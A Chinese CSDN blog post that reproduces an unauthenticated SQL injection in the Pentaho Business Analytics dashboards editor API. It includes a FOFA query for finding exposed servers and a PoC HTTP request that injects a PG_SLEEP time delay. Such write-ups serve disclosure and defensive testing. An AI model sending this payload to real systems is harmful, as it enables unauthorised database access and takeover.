Pentaho业务分析平台 SQL注入漏洞复现

已于 2023-12-04 17:35:54 修改
阅读量641 收藏 7
点赞数 10
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-04 16:23:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134786832
版权

0x01 产品简介

  Pentaho Business Analytics是一款使您能够安全地访问、集成、操作、可视化和分析大数据资产的业务分析平台。

0x02 漏洞概述

 Pentaho 业务分析平台在/pentaho/api/repos/dashboards/editor路径query参数存在SQL注入漏洞,攻击者可未授权执行任意SQL语句,获取账号密码等敏感信息,进一步接管系统。

0x03 影响范围

 Pentaho <= 9.1

0x04 复现环境

FOFA:app="Pentaho-用户控制台"

0x05 漏洞复现 

PoC

GET /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&require-cfg.js&query=%3BSELECT+PG_SLEEP%288%29-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

延时8秒 (PG_SLEEP(8))

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Pentaho多维分析(Mondrian)使用指南
11-13
本文档介绍 OLAP、MDX 基本概念和原理、Mondrian 的使用和一些前端工具的使用。其中 “基本概念”和“MDX”这两章基本都是通用的内容,并不仅限于 Mondrian。 本文档主要用做简略的指南,更深入、更详细的内容请参考...
Pentaho源码分析
10-24
Pentaho是一个开源的商业智能(BI)平台,它提供了数据集成、报表、分析和数据挖掘等功能。本文件将深入探讨Pentaho的内部架构和设计思想,帮助读者理解其核心组件和工作原理。 ### Pentaho项目简介 Pentaho BI...
Pentaho
wjandy0211的博客
03-06 398
PentahoThe Pentaho products consist of Business Analytics (BA) and Data Integration (DI) components. Which components you use depend on your workflow and what your environment supports:Pentaho Busines...
java做报表_推荐6款常用的Java开源报表制作工具
weixin_35147304的博客
02-12 3865
1.JasperReports是一个基于Java的开源报表工具,它可以在Java环境下像其他IDE报表工具一样来制作报表。JasperReports支持PDF、HTML、XLS、CSV和XML文件输出格式。JasperReports是当前Java开发者最常用的报表工具。2.Pentaho是一个以工作流为核心的、强调面向解决方案而非工具组件的BI套件,整合了多个开源项目,目标是和商业BI相抗衡。它偏...
Pentaho 4.1发布,优秀的开源商业智能解决方案 - 企业架构 - ITeye资讯
01-03 94
Pentaho 4.1发布,优秀的开源商业智能解决方案 - 企业架构 - ITeye资讯 Pentaho 4.1发布,优秀的开源商业智能解决方案 - 企业架构 - ITeye资讯Pentaho最近已发布了其开源商业智能套件的4.1版本。该版本在数据分析性能、可扩...
pentaho开源商业智能平台的搭建
xyzroundo的专栏
06-24 1845
来源:http://yahoon.blog.51cto.com/13184/155835/  pentaho开源商业智能平台的搭建pentaho是世界上最流行的开源商务只能软件。它是一个基于java平台的商业智能(Business Intelligence,BI)套件,之所以说是套件是因为它包括一个web server平台和几个工具软件:报表,分析,图表,数据集成,数据挖掘等,可以
很多大企业都在用的Pentaho 商业分析软件中存在多个严重缺陷
smellycat000的专栏
11-02 515
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士德国网络安全公司 Hawsec 的研究员 Alberto Favero 和 Census Labs 公司的研究员 Altion Malk...
pentaho sample data sql
03-14
pentaho 社区版的数据库在换到mysql以后,缺少sample data数据库的创建语句,这个sql就是用来做这件事的。
pentaho create_repository_mysql.sql
07-25
CREATE DATABASE IF NOT EXISTS `hibernate` DEFAULT CHARACTER SET latin1; USE hibernate; GRANT ALL ON hibernate.* TO 'hibuser'@'localhost' identified by 'password'; commit;
pentaho的sample_data.sql
03-23
pentaho 社区版的数据库在换到mysql以后,缺少sample data数据库的创建语句,这个sql就是用来做这件事的。
[Pentaho] Pentaho 5.0 报表实例开发 初学者指南 (英文版)
01-17
☆ 资源说明:☆ [Packt Publishing] Pentaho 5.0 报表实例开发 初学者指南 (英文版) [Packt Publishing] Pentaho 5.0 Reporting by Example Beginner's Guide (E-Book) ☆ 图书概要:☆ Create high-quality, professional, standard reports using today's most popular open source reporting tool Overview Install and configure PRD in Linux and Windows Create complex reports using relational data sources Produce reports with groups, aggregate functions, parameters, graphics, and sparklines Install and configure Pentaho BI Server to execute PRD reports Create and publish your own Java web application with parameterized reports and an interactive user interface ☆ 出版信息:☆ [作者信息] Mariano García Mattío , Dario R. Bernabeu [出版机构] Packt Publishing [出版日期] 2013年08月21日 [图书页数] 342页 [图书语言] 英语 [图书格式] PDF 格式
Pentaho Business Analytics Cookbook(2014)随书代码
11-08
Chapter 1, 3, 8, 9, 10 do not have any particular code files.
pentaho business analytics cookbook
04-20
pentaho business analytics cookbook 彩色电子版,完整版本。 书中完整讲述了pentaho工具的安装和使用等,
用过pentaho的人,一起讨论一下
jch26的专栏
09-07 2108
    最近一个月都在调查学习pentaho。首先搭了一个服务器,有两个界面,用户界面和管理界面。界面上的操作是很容易的。目前在学习各种工具的使用方法:report-designer,data-integration,schema-workbench,等等。自己只会一些很简单的东西,希望有经验的人可以在这里交流一下。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 424
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 494
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 441
2024安全大模型技术与市场研究报告
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1147
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 691
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
Pentaho大数据分析平台详解与部署
Pentaho for Big Data Analytics》是一本深度探讨大数据分析领域中Pentaho解决方案的专业指南。本书主要关注Pentaho BI Suite在处理大数据环境下的应用和优势,以及如何有效地设置和管理Pentaho BI Server和相关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值